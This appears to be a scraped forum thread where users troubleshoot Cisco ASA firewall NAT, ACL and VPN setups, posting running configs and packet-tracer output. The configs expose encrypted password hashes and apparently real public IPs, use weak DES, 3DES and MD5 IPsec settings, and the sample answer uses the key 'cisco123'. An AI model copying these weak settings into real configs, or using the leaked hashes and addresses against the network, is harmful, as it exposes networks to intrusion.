access-list outside_access_in extended permit tcp any host 58.13.254.13 object-group DM_INLINE_TCP_1
access-list outside_access_in remark dns service to hub
access-list outside_access_in extended permit object-group TCPUDP any host 58.13.254.13 eq domain
access-list dmz_access_in extended permit ip 192.168.10.0 255.255.255.0 any
access-list dmz_access_in extended permit tcp any host 192.168.10.251 object-group DM_INLINE_TCP_2
access-list public_access_in remark Web access to DMZ websites (mediastudio/civicrm)
access-list public_access_in extended permit object-group TCPUDP any object-group DM_INLINE_NETWORK_2 eq www
access-list public_access_in remark General web access. (HTTP, DNS & ICMP and Email)
access-list public_access_in extended permit object-group public_wifi_group any any
access-list inside_nat0_outbound extended permit ip 192.168.0.0 255.255.255.0 192.168.10.0 255.255.255.0
access-list inside_nat0_outbound extended permit ip 192.168.0.0 255.255.255.0 192.168.20.0 255.255.255.0
access-list inside_nat0_outbound extended permit ip any 192.168.0.80 255.255.255.240
access-list inside_nat0_outbound extended permit ip any 192.168.0.64 255.255.255.192
pager lines 24
logging enable
logging timestamp
logging buffered notifications
logging trap notifications
logging asdm debugging
logging from-address [email protected]
logging recipient-address [email protected] level warnings
logging host dmz 192.168.10.90 format emblem
logging permit-hostdown
mtu outside 1500
mtu public 1500
mtu dmz 1500
mtu inside 1500
ip local pool OfficePool 192.168.0.80-192.168.0.90 mask 255.255.255.0
ip local pool VPN_Pool 192.168.0.91-192.168.0.99 mask 255.255.255.0
no failover
icmp unreachable rate-limit 1 burst-size 1
no asdm history enable
arp timeout 60
global (outside) 1 interface
global (dmz) 2 interface
nat (public) 1 0.0.0.0 0.0.0.0
nat (dmz) 1 0.0.0.0 0.0.0.0
nat (inside) 0 access-list inside_nat0_outbound
nat (inside) 1 0.0.0.0 0.0.0.0
static (inside,outside) tcp interface 2229 192.168.0.29 2229 netmask 255.255.255.255
static (inside,outside) tcp interface 8029 192.168.0.29 www netmask 255.255.255.255
static (dmz,outside) 58.13.254.13 192.168.10.10 netmask 255.255.255.255 dns
static (dmz,outside) 58.13.254.11 192.168.10.30 netmask 255.255.255.255 dns
static (inside,dmz) 192.168.10.0 192.168.0.0 netmask 255.255.255.0 dns
static (dmz,inside) 192.168.0.251 192.168.10.251 netmask 255.255.255.255
static (dmz,public) 192.168.20.30 192.168.10.30 netmask 255.255.255.255 dns
static (dmz,public) 192.168.20.10 192.168.10.10 netmask 255.255.255.255 dns
access-group outside_access_in in interface outside
access-group public_access_in in interface public
access-group dmz_access_in in interface dmz
route outside 0.0.0.0 0.0.0.0 58.13.254.9 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
dynamic-access-policy-record DfltAccessPolicy
http server enable
http 192.168.0.0 255.255.255.0 inside
http 59.159.40.188 255.255.255.255 outside
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart
sysopt noproxyarp dmz
sysopt noproxyarp inside
crypto ipsec transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac
crypto ipsec transform-set ESP-DES-SHA esp-des esp-sha-hmac
crypto ipsec transform-set ESP-DES-MD5 esp-des esp-md5-hmac
crypto ipsec transform-set ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac
crypto ipsec transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
crypto ipsec transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac
crypto ipsec transform-set ESP-AES-128-SHA esp-aes esp-sha-hmac
crypto ipsec transform-set ESP-AES-192-SHA esp-aes-192 esp-sha-hmac
crypto ipsec transform-set ESP-AES-128-MD5 esp-aes esp-md5-hmac
crypto ipsec transform-set TRANS_ESP_3DES_SHA esp-3des esp-sha-hmac
crypto ipsec transform-set TRANS_ESP_3DES_SHA mode transport
crypto ipsec transform-set ESP-3DES-SHA esp-3des esp-sha-hmac
crypto ipsec security-association lifetime seconds 28800
crypto ipsec security-association lifetime kilobytes 4608000
crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 set pfs group1
crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 set transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map inside_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map inside_map interface inside
crypto map outside_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map outside_map interface outside
crypto map public_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map public_map interface public
crypto isakmp enable outside
crypto isakmp enable public
crypto isakmp enable inside
crypto isakmp policy 5
authentication pre-share
encryption 3des
hash sha
group 2
lifetime 86400
crypto isakmp policy 10
authentication pre-share
encryption des
hash sha
group 2
lifetime 86400
telnet timeout 5
ssh 59.159.40.188 255.255.255.255 outside
ssh 192.168.0.0 255.255.255.0 inside
ssh timeout 20
console timeout 0
dhcpd dns 61.122.112.97 61.122.112.1
dhcpd auto_config outside
dhcpd address 192.168.20.200-192.168.20.254 public
dhcpd enable public
dhcpd address 192.168.10.190-192.168.10.195 dmz
dhcpd enable dmz
dhcpd address 192.168.0.200-192.168.0.254 inside
dhcpd enable inside
threat-detection basic-threat
threat-detection statistics access-list
threat-detection statistics host number-of-rate 2
no threat-detection statistics tcp-intercept
ntp server 130.54.208.201 source public
webvpn
group-policy DefaultRAGroup internal
group-policy DefaultRAGroup attributes
dns-server value 61.122.112.97 61.122.112.1
vpn-tunnel-protocol l2tp-ipsec
group-policy CiscoASA internal
group-policy CiscoASA attributes
dns-server value 61.122.112.97 61.122.112.1
vpn-tunnel-protocol IPSec
username mcit password 4alT9CZ8ayD8O8Xg encrypted privilege 15
tunnel-group DefaultRAGroup general-attributes
address-pool VPN_Pool
default-group-policy DefaultRAGroup
tunnel-group DefaultRAGroup ipsec-attributes
pre-shared-key *****
tunnel-group ocmc type remote-access
tunnel-group ocmc general-attributes
address-pool OfficePool
tunnel-group ocmc ipsec-attributes
pre-shared-key *****
tunnel-group CiscoASA type remote-access
tunnel-group CiscoASA general-attributes
address-pool VPN_Pool
default-group-policy CiscoASA
tunnel-group CiscoASA ipsec-attributes
pre-shared-key *****
class-map inspection_default
match default-inspection-traffic
policy-map type inspect dns preset_dns_map
parameters
message-length maximum client auto
message-length maximum 512
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
inspect ftp
inspect h323 h225
inspect h323 ras
inspect ip-options
inspect netbios
inspect rsh
inspect rtsp
inspect skinny
inspect esmtp
inspect sqlnet
inspect sunrpc
inspect tftp
inspect sip
inspect xdmcp
service-policy global_policy global
smtp-server 192.168.10.10
prompt hostname context
call-home
profile CiscoTAC-1
no active
destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService
destination address email [email protected]
destination transport-method http
subscribe-to-alert-group diagnostic
subscribe-to-alert-group environment
subscribe-to-alert-group inventory periodic monthly
subscribe-to-alert-group configuration periodic monthly
subscribe-to-alert-group telemetry periodic daily
Cryptochecksum:222d6dcb583b5f5abc51a2251026f7f2
: end
asdm location 192.168.10.10 255.255.255.255 inside
asdm location 192.168.0.29 255.255.255.255 inside
asdm location 58.13.254.10 255.255.255.255 inside
no asdm history enableHi Conor,
What is your local net ? I see only one default route for outside network. Dont you need a route inside for your local network.
Regards,
Umair -
after tried to setup access list, it return drop in packet tracer and can not ping outside router too
is there an configuration example to show allow a subnet of class C IP address to surf internet in Cisco ASA ?
assume all works in GNS3, expect initial network setup too
inside outside
router A 192.168.1.2 <--->switch <---> 192.168.1.1 ASA 192.168.1.4 <---> switch <---> router B 192.168.1.3
ASA version: 8.42
when i try the following command,
ASA
conf t
interface GigabitEthernet 0
description INSIDE
nameif inside
security-level 0
ip address 192.168.1.1 255.255.255.0
no shut
end
conf t
interface GigabitEthernet 1
description OUTSIDE
no shutdown
nameif outside
security-level 100
ip address 192.168.1.4 255.255.255.0
no shut
end
conf t
object network obj_any
subnet 0.0.0.0 0.0.0.0
nat (inside,outside) dynamic interface
end
conf t
access-list USERSLIST permit ip 192.168.1.0 255.255.255.0 any
access-group USERSLIST in interface inside
end
Router A
conf t
int fastEthernet 0/0
ip address 192.168.1.2 255.255.255.0
no shut
end
Router B
conf t
int fastEthernet 0/0
ip address 192.168.1.3 255.255.255.0
no shut
end
ASA-1# packet-tracer input inside tcp 192.168.1.1 1 192.168.1.4 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.1.0 255.255.255.0 inside
Phase: 2
Type: ACCESS-LIST
Subtype:
Result: DROP
Config:
Implicit Rule
Additional Information:
Result:
input-interface: inside
input-status: up
input-line-status: up
output-interface: inside
output-status: up
output-line-status: up
Action: drop
<--- More --->current config can not ping, one of packet tracer allow all, another packet tracer drop
can not ping between Router A and Router B
ASA-1# packet-tracer input inside tcp 192.168.1.2 1 192.168.3.3 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.3.0 255.255.255.0 outside
Phase: 2
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 3
Type: NAT
Subtype:
Result: ALLOW
Config:
object network DYNAMIC-PAT
nat (inside,outside) dynamic interface
Additional Information:
Dynamic translate 192.168.1.2/1 to 192.168.3.4/311
<--- More --->
<--- More --->
Phase: 4
<--- More --->
Type: IP-OPTIONS
<--- More --->
Subtype:
<--- More --->
Result: ALLOW
<--- More --->
Config:
<--- More --->
Additional Information:
<--- More --->
<--- More --->
Phase: 5
<--- More --->
Type: FLOW-CREATION
<--- More --->
Subtype:
<--- More --->
Result: ALLOW
<--- More --->
Config:
<--- More --->
Additional Information:
<--- More --->
New flow created with id 14, packet dispatched to next module
<--- More --->
<--- More --->
Result:
<--- More --->
input-interface: inside
<--- More --->
input-status: up
<--- More --->
input-line-status: up
<--- More --->
output-interface: outside
<--- More --->
output-status: up
<--- More --->
output-line-status: up
<--- More --->
Action: allow
<--- More --->
ASA-1# packet-tracer input outside tcp 192.168.3.3 1 192.168.1.2 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.1.0 255.255.255.0 inside
Phase: 2
Type: ACCESS-LIST
Subtype:
Result: DROP
Config:
Implicit Rule
Additional Information:
Result:
input-interface: outside
input-status: up
input-line-status: up
output-interface: inside
output-status: up
output-line-status: up
Action: drop
<--- More --->
Drop-reason: (acl-drop) Flow is denied by configured rule
<--- More --->
ASA-1#
ASA-1# sh run |
: Saved
ASA Version 8.4(2)
hostname ASA-1
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
names
interface GigabitEthernet0
description INSIDE
nameif inside
security-level 100
ip address 192.168.1.1 255.255.255.0
interface GigabitEthernet1
description OUTSIDE
nameif outside
security-level 0
ip address 192.168.3.4 255.255.255.0
interface GigabitEthernet2
shutdown
no nameif
no security-level
<--- More --->
no ip address
<--- More --->
<--- More --->
ftp mode passive
<--- More --->
object network DYNAMIC-PAT
<--- More --->
subnet 192.168.1.0 255.255.255.0
<--- More --->
access-list 101 extended permit icmp any any echo-reply
<--- More --->
access-list 101 extended permit icmp any any source-quench
<--- More --->
access-list 101 extended permit icmp any any unreachable
<--- More --->
access-list 101 extended permit icmp any any time-exceeded
<--- More --->
access-list ACL-OUTSIDE extended permit icmp any any
<--- More --->
pager lines 24
<--- More --->
mtu inside 1500
<--- More --->
mtu outside 1500
<--- More --->
icmp unreachable rate-limit 1 burst-size 1
<--- More --->
no asdm history enable
<--- More --->
arp timeout 14400
<--- More --->
<--- More --->
object network DYNAMIC-PAT
<--- More --->
nat (inside,outside) dynamic interface
<--- More --->
access-group ACL-OUTSIDE in interface outside
<--- More --->
timeout xlate 3:00:00
<--- More --->
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
<--- More --->
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
<--- More --->
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
<--- More --->
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
<--- More --->
timeout tcp-proxy-reassembly 0:01:00
<--- More --->
timeout floating-conn 0:00:00
<--- More --->
dynamic-access-policy-record DfltAccessPolicy
<--- More --->
user-identity default-domain LOCAL
<--- More --->
no snmp-server location
<--- More --->
no snmp-server contact
<--- More --->
snmp-server enable traps snmp authentication linkup linkdown coldstart warmstart
<--- More --->
telnet timeout 5
<--- More --->
ssh timeout 5
<--- More --->
console timeout 0
<--- More --->
threat-detection basic-threat
<--- More --->
threat-detection statistics access-list
<--- More --->
no threat-detection statistics tcp-intercept
<--- More --->
<--- More --->
<--- More --->
prompt hostname context
<--- More --->
no call-home reporting anonymous
<--- More --->
call-home
<--- More --->
profile CiscoTAC-1
<--- More --->
no active
<--- More --->
destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService
<--- More --->
destination address email [email protected]
<--- More --->
destination transport-method http
<--- More --->
subscribe-to-alert-group diagnostic
<--- More --->
subscribe-to-alert-group environment
<--- More --->
subscribe-to-alert-group inventory periodic monthly
<--- More --->
subscribe-to-alert-group configuration periodic monthly
<--- More --->
subscribe-to-alert-group telemetry periodic daily
<--- More --->
crashinfo save disable
<--- More --->
Cryptochecksum:8ee9b8e8ccf0bf1873cd5aa1efea2b64
<--- More --->
: end
ASA-1# -
ASA 5510 traffic from inside to outside
Hello,
I'm working on a basic configuration of a 5510 ASA.
inside network of 192.168.23.0 /24
outside network 141.0.x.0 /24
config is as follows:
interface Ethernet0/0
nameif OUTSIDE
security-level 0
ip address 141.0.x.0 255.255.255.0
interface Ethernet0/1
nameif INSIDE
security-level 50
ip address 192.168.23.1 255.255.255.0
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
access-list OUTSIDE_access_in extended permit icmp any any
access-list OUTSIDE_access_in extended permit tcp any interface OUTSIDE eq https
access-list INSIDE_access_in extended permit icmp any any
global (OUTSIDE) 1 interface
nat (INSIDE) 1 192.168.23.0 255.255.255.0
access-group OUTSIDE_access_in in interface OUTSIDE
access-group INSIDE_access_in in interface INSIDE
route OUTSIDE 0.0.0.0 0.0.0.0 141.0.x.57 1
In the LAB When I plug a laptop into the outside interface with address 141.0.x.57 I can ping it from a laptop from the inside interface and I can even access the IIS page. However, when I connect the ISP's firewall into the outside interface with the same address that I used the testing laptop with, I cannot seem to be able to access the outside world.
I can ping from the ASA's outside interface (x.58, to the ISP's x.57), but I cannot ping from the inside 192.168.23.x to it or access anything.
So traffic between inside and outside interface is not going through when in live setup. However, when in the lab it works fine.
Any ideas please?Version of FW:
Cisco Adaptive Security Appliance Software Version 8.2(1)
Device Manager Version 6.3(1)
Output of Packet-Trace Command is:
SDH-PUBLIC-ASA(config)# packet-tracer input INSIDE icmp 192.168.23.10 8 0 1xpacket-tracer input INSIDE icmp 192.168.23.10 8 0 141.$
Phase: 1
Type: ACCESS-LIST
Subtype:
Result: ALLOW
Config:
Implicit Rule
Additional Information:
MAC Access list
Phase: 2
Type: FLOW-LOOKUP
Subtype:
Result: ALLOW
Config:
Additional Information:
Found no matching flow, creating a new flow
Phase: 3
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 141.0.x.0 255.255.255.0 OUTSIDE
Phase: 4
Type: ACCESS-LIST
Subtype: log
Result: ALLOW
Config:
access-group INSIDE_access_in in interface INSIDE
access-list INSIDE_access_in extended permit icmp any any
Additional Information:
Phase: 5
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 6
Type: INSPECT
Subtype: np-inspect
Result: ALLOW
Config:
class-map inspection_default
match default-inspection-traffic
policy-map global_policy
class inspection_default
inspect icmp
service-policy global_policy global
Additional Information:
Phase: 7
Type: INSPECT
Subtype: np-inspect
Result: ALLOW
Config:
Additional Information:
Phase: 8
Type: NAT
Subtype:
Result: ALLOW
Config:
nat (INSIDE) 0 192.168.23.0 255.255.255.0
match ip INSIDE 192.168.23.0 255.255.255.0 OUTSIDE any
identity NAT translation, pool 0
translate_hits = 104, untranslate_hits = 0
Additional Information:
Dynamic translate 192.168.23.10/0 to 192.168.23.10/0 using netmask 255.255.255.255
Phase: 9
Type: NAT
Subtype: host-limits
Result: ALLOW
Config:
nat (INSIDE) 0 192.168.23.0 255.255.255.0
match ip INSIDE 192.168.23.0 255.255.255.0 OUTSIDE any
identity NAT translation, pool 0
translate_hits = 107, untranslate_hits = 0
Additional Information:
Phase: 10
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 11
Type: FLOW-CREATION
Subtype:
Result: ALLOW
Config:
Additional Information:
New flow created with id 141, packet dispatched to next module
Result:
input-interface: INSIDE
input-status: up
input-line-status: up
output-interface: OUTSIDE
output-status: up
output-line-status: up
Action: allow -
ASA 5505 initial build - Failed to locate egress interface (Please help :-) )
Hi, I have just purchased a ASA 5505 and have completed the initial setup via the wizard. I am currently unable to access services on the outside of the ASA.
The error: 'Failed to locate egress interface for UDP from inside'.... appears when ever my DNS server attempts a lookup.
I have configured this several times from scratch using the wizard and I am unable to figure out the issue with the NAT / Routing config.
If I run the packet tracer I get the error: "(no-route) no route to host", however I do have a default route configured so I suspect it maybe my NAT configuration.
Overview, 192.168.10.0/24 inside the ASA, 192.168.1.0/24 outside the ASA, 192.168.1.1 is the gateway to the internet. I ideally want the ASA to use PAT to mask the 192.168.10.0/24 network behind the ASAs 192.168.1.0/24 network address but still allow clients to gain internet access.
Full config follows, screen shots attached, any help would be very gratefully received.
Result of the command: "sh run"
: Saved
ASA Version 9.0(1)
hostname firewall
enable password (REMOVED) encrypted
passwd (REMOVED) encrypted
names
interface Ethernet0/0
switchport access vlan 2
interface Ethernet0/1
interface Ethernet0/2
interface Ethernet0/3
interface Ethernet0/4
interface Ethernet0/5
interface Ethernet0/6
interface Ethernet0/7
interface Vlan1
nameif inside
security-level 100
ip address 192.168.10.1 255.255.255.0
interface Vlan2
nameif outside
security-level 0
ip address 192.168.1.254 255.255.255.0
interface Vlan5
no nameif
security-level 50
ip address dhcp
ftp mode passive
object network obj_any
subnet 0.0.0.0 0.0.0.0
object network Server1
host 192.168.10.10
object network GoogleDNS1
host 8.8.8.8
description Google DNS Server
object network GoogleDNS2
host 8.8.4.4
description Google DNS Server
object network 192.168.10.x
subnet 192.168.10.0 255.255.255.0
object network InternetRouter
host 192.168.1.1
object-group network DM_INLINE_NETWORK_1
network-object object GoogleDNS1
network-object object GoogleDNS2
object-group service DM_INLINE_TCP_1 tcp
port-object eq www
port-object eq https
access-list inside_access_in remark External DNS Lookups
access-list inside_access_in extended permit udp object Server1 object-group DM_INLINE_NETWORK_1 eq domain
access-list inside_access_in extended permit tcp 192.168.10.0 255.255.255.0 any object-group DM_INLINE_TCP_1
access-list inside_access_in extended deny ip any any
pager lines 24
logging enable
logging asdm informational
mtu inside 1500
mtu outside 1500
icmp unreachable rate-limit 1 burst-size 1
no asdm history enable
arp timeout 14400
no arp permit-nonconnected
nat (inside,outside) source dynamic any interface
object network obj_any
nat (inside,outside) dynamic interface
access-group inside_access_in in interface inside
route outside 0.0.0.0 255.255.255.255 192.168.1.1 1
timeout xlate 3:00:00
timeout pat-xlate 0:00:30
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
timeout floating-conn 0:00:00
dynamic-access-policy-record DfltAccessPolicy
user-identity default-domain LOCAL
http server enable
http 192.168.1.0 255.255.255.0 inside
http 192.168.10.0 255.255.255.0 inside
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart warmstart
crypto ipsec security-association pmtu-aging infinite
crypto ca trustpool policy
telnet timeout 5
ssh timeout 5
ssh version 2
console timeout 0
dhcpd auto_config outside
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
prompt hostname context
no call-home reporting anonymous
Cryptochecksum:(REMOVED)
: endJust to want to be sure, can you post output from show int ip brie and show route? And try to remove your ACL for testing purpose or at least don't applied it anywhere yet.
Once done, try do another packet-tracer to 8.8.8.8 using icmp packet instead of UDP paste the whole the output here. Before doing this, add icmp any any outside command on the ASA.
I know this should have anything to do with your issue, because if ACL is the issue then you will see output being denied by ACL on the packet tracer output. Let us know the results. -
ASA 5525X - Multiple Outside Interface
Hello,
Question:
I have a pair of ASA 5252X for VPN Traffic, the interfaces are:
- Inside
- DMZ
- Outside - ISP1 - IP 1.1.1.1
I can have two "outside" interfaces, multiple ISP's for VPN traffic(Site to Site)?
- Inside
- DMZ
- Outside - ISP1 - IP 1.1.1.1
- Outside2 - ISP2 - IP 2.2.2.2
I need this because i have problems with only one ISP, so i need to install more one and in the remote peer add a second peer IP(for ISP2), so if the remote peer cannot establish the connection over the ISP1, he going to ISP2, it's possible?
Tks.
RafaelYes Rafael, it possible.
you need to configure SLA monitoring on ASA for the ISP failover.
And for the VPN add the second ISP ip as a back up peer on the remote device.
on your ASA where you have dual iSP, the same crypto map will be applied on both the interface.
In case if you need any assistance regarding the configuration let me know.
Configuration should look something like this:
interface Ethernet0
nameif outside
security-level 0
ip address 10.200.159.2 255.255.255.248
interface Ethernet2
nameif inside
security-level 100
ip address 172.22.1.163 255.255.255.0
interface Ethernet1
nameif backup
security-level 0
ip address 10.250.250.2 255.255.255.248
access-list outside_crypto_1 permit ip 172.22.1.0 255.255.255.0 (your internal private ip) x.x.x.x x.x.x.x (remote site internal ip you want to access)
access-list nonat permit ip 172.22.1.0 255.255.255.0 (your internal private ip) x.x.x.x x.x.x.x (remote site internal ip you want to access)
crypto ipsec transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
isakmp policy 20 authentication pre-share
isakmp policy 20 encryption 3des
isakmp policy 20 hash md5
isakmp policy 20 group 2
isakmp policy 20 lifetime 86400
crypto map outside_map 20 match address outside_crypto_1
crypto map outside_map 20 set peer x.x.x.x (Public ip of the remote site)
crypto map outside_map 20 set transform-set ESP-3DES-MD5
crypto map outside_map interface outside
crypto map outside_map interface backup
crypto isakmp enable backup
crypto isakmp enable outside
global (outside) 1 interface
global (backup) 1 interface
nat (inside) 1 172.22.1.0 255.255.255.0
nat (inside) 0 access-list nonat
tunnel-group x.x.x.x (public ip of the remote site) type ipsec-l2l
tunnel-group x.x.x.x ipsec-attributes
pre-shared-key cisco123
route outside 0.0.0.0 0.0.0.0 10.200.159.1 1 track 1
route backup 0.0.0.0 0.0.0.0 10.250.250.1 254
sla monitor 123
type echo protocol ipIcmpEcho 10.0.0.1 interface outside
num-packets 3
frequency 10
sla monitor schedule 123 life forever start-time now
track 1 rtr 123 reachability
Important Information:
===============================================
** With the use of track ASA will keep on monitor the MPLS interface (outside in this example) with the help of ICMP packets. The moment it will stop getting the replies it will flush the primary route and start pointing the routes toward the back up interface.
** Crypto map will be applied on the back up interface and the remote site should you the public ip of the back up interface as VPN peer.
** As soon as ASA will start getting the reply from the outside interface it will again start pointing the routes towards the MPLS interface.
** I hope this will answer your query.
Thanks
Jeet -
i have an ASA 5520 ver 8.4 with the following config
WAN
207.211.25.34
Production
10.11.12.1 255.255.255.0
Mgmt
10.11.11.1 255.255.255.0
i need to create a peer-2-peer VPN to a remote site ASP16 from both Prod and Mgmt
what would my nat statement look like ?
currently i have the following but can only ping from Mgmt not Prod (ASP17 is an network object group that contain the Prod and Mgmt subnets )
nat (Production,WAN) source static ASP17_VPN ASP17_VPN destination static ASP16 ASP16 no-proxy-arp route-lookup
nat (Mgmt,WAN) source static ASP17_VPN ASP17_VPN destination static ASP8_Prod ASP8_ProdHello Tejas,
After reading your configuration I can see that the crypto-maps are applyed to the outside interface, and the Access-list for the interesting traffic has both networks (Managment and production) so you should be able to access the other network from this site.
Can you do the following packet tracers to see the features the ICMP packet is hitting when the Request is sent.
I will need the output of the following commands:
1- Packet-tracer input Mgmt icmp 10.11.34.15 8 0 10.30.6.15
2-Packet-tracer input Production icmp 10.11.35.15 8 0 10.30.6.15
Please rate helpful posts,
Julio!!
Maybe you are looking for
-
Dear all: I am experiencing a problem with iWeb. The text I create on iWeb pages don't seem to be rendered as text but rather images. After I created several pages for my business' web page, publish them to a folder and open with any browser (I use S
-
I can only import photos in groups of three
This is a new development, perhaps since the last iPhoto update? Anyway, let's say I have 15 photos to import, Pentax K-50, iPhoto freezes after three are imported. The only way out seems to be to turn off camera or unplug it then repeat the process
-
Keyboard cover for Late 2008 Unibody MB Pro?
Hi, was just wondering if anyone has found a good keyboard cover for a Unibody Late 2008 MB Pro. I recently purchased this Moshi ClearGuard keyboard cover but it didn't fit, despite a few people saying it did in the reviews. Thanks, Evan
-
Sales Invoice is not generating 2 line items?
HI, My SD consultant has created Sales Order and did the billing and released that to accounting.Now the problem is - system is generating only customer account -Debit and system is not generating the Sales account as credit. what could be the reason
-
Mac OS X Lion Recovery partition lost
For whatever reason, the recovery partition on my mac is not showing up. Find My Mac requires a recovery partition to run. I was wondering if there is a way I can create/recreate a recovery partition in lion. Thanks, Matt